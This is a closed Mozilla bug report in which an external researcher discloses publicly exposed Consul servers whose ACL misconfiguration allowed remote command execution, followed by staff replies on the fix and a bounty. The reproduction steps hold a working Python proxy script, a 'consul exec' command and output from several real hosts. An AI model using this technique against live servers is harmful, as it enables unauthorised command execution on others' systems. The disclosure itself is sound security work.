Closed Bug 1308779 Opened 9 years ago Closed 9 years ago

Exposed consul server and RCE issue

Categories

(Infrastructure & Operations :: Infrastructure: Other, task)

Product:
Infrastructure & Operations
Component:
Infrastructure: Other
Type:
task
Priority:
Not set
Severity:
major

Tracking

(Not tracked)

Status:
RESOLVED FIXED

People

(Reporter: kenney_lu, Unassigned)

Details

(Keywords: reporter-external, sec-moderate, wsec-injection)

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 Steps to reproduce: Hi there, I found several consul servers are exposed on the internet. public.consul.stage.us-east-1.nubis-lab.nubis.allizom.org public.consul.prod.us-west-2.nubis-training-2016.nubis.allizom.org public.consul.admin.us-west-2.nubis-lab.nubis.allizom.org public.consul.admin.us-east-1.nubis-lab.nubis.allizom.org public.consul.stage.us-west-2.nubis-training-2016.nubis.allizom.org According to WHOIS information, I believe those servers are belong to Mozilla, although public consul servers are not a big problem, but it seems ACL rule is incorrect, I can easy to bypass and execute any command with consul account privilege on every / specific server, please fix it to avoid being hacked. How to reproduce: 1. Prepare a simple python script to proxy HTTP to HTTPS and execute it as a proxy server ---------------------------------------------------------------- #!/usr/bin/env python import tornado.ioloop import maproxy.proxyserver import sys server = maproxy.proxyserver.ProxyServer('52.202.226.93', '443', server_ssl_options=True) server.listen(80) tornado.ioloop.IOLoop.instance().start() ---------------------------------------------------------------- 2. Execute command via consul > consul exec --prefix="_test" -http-addr=127.0.0.1 "uname -a" 3. The command will be executed and show all results Reference: https://github.com/hashicorp/consul/issues/1238 Actual results: > consul exec --prefix="_test" -http-addr=127.0.0.1 "uname -a" ==> i-296c1a18: finished with exit code 0 i-296c1a18: Linux ip-10-162-2-104 3.13.0-93-generic #140-Ubuntu SMP Mon Jul 18 21:21:05 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux i-296c1a18: ==> i-3a92a72d: finished with exit code 0 i-3a92a72d: Linux ip-10-162-2-57 4.4.19-29.55.amzn1.x86_64 #1 SMP Mon Aug 29 23:29:40 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux i-3a92a72d: ==> i-ca0ddfdc: finished with exit code 0 i-ca0ddfdc: Linux ip-10-162-2-143 3.13.0-96-generic #143-Ubuntu SMP Mon Aug 29 20:15:20 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux i-ca0ddfdc: ==> i-d0d3e0c6: finished with exit code 0 i-d0d3e0c6: Linux ip-10-162-2-170 3.13.0-96-generic #143-Ubuntu SMP Mon Aug 29 20:15:20 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux i-d0d3e0c6: ==> i-d720b2c1: finished with exit code 0 i-d720b2c1: Linux ip-10-162-2-74 4.4.19-29.55.amzn1.x86_64 #1 SMP Mon Aug 29 23:29:40 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux i-d720b2c1: ==> i-e29e80d3: finished with exit code 0 i-e29e80d3: Linux ip-10-162-2-105 3.13.0-96-generic #143-Ubuntu SMP Mon Aug 29 20:15:20 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux i-e29e80d3: ==> i-e44137d5: finished with exit code 0 i-e44137d5: Linux ip-10-162-2-16 4.4.19-29.55.amzn1.x86_64 #1 SMP Mon Aug 29 23:29:40 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux i-e44137d5: Expected results: Avoid public consul server or set ACL correctly.
Severity: normal → major
Group: infrasec
QA Contact: cshields → gozer
Our Consul server installations were never meant/designed to be publicly-accessible. However, for convenience, we have made them available in these 2 accounts, for what was meant to be a short time, on purpose. Thanks for finding this out and pointing it out. I'll be closing them off shortly and it's worthwile pointing that these accounts did not hold any valuable information. Both accounts are testing/training acounts with no real applications deployed in them. Nontheless, I'll be looking at why we didn't close them back up sooner, and looking at a mechanism to do so in the future that's more controlled and secure.
nubis-training-2016 account has been closed up, and all publicly accessible instances have been terminated and recycled.
nubis-lab account has been closed up, and all publicly accessible instances have been terminated and recycled.
Status: UNCONFIRMED → RESOLVED
Closed: 9 years ago
Resolution: --- → FIXED
Downgrading bug security groups now that the issue is triaged. This was a very unusual incident that doesn't fit into our normal models for security issues. I'm setting sec-bounty? to ensure that the bounty review team is made aware of it. It may take them several weeks to evaluate with the Nubis team whether this issue earns a bounty; when a decision is reached, they will update the bug accordingly.
Group: infrasec
Flags: sec-bounty?
adamm to look into the security implications of this.
Flags: needinfo?(amuntner)
Flags: needinfo?(amuntner)
Keywords: wsec-appmisconfig
Follow on investigation is complete.
Group: mozilla-employee-confidential → websites-security
Keywords: wsec-appmisconfigsec-moderate, wsec-injection
Flags: sec-bounty? → sec-bounty+
Group: websites-security
You need to log in before you can comment on or make changes to this bug.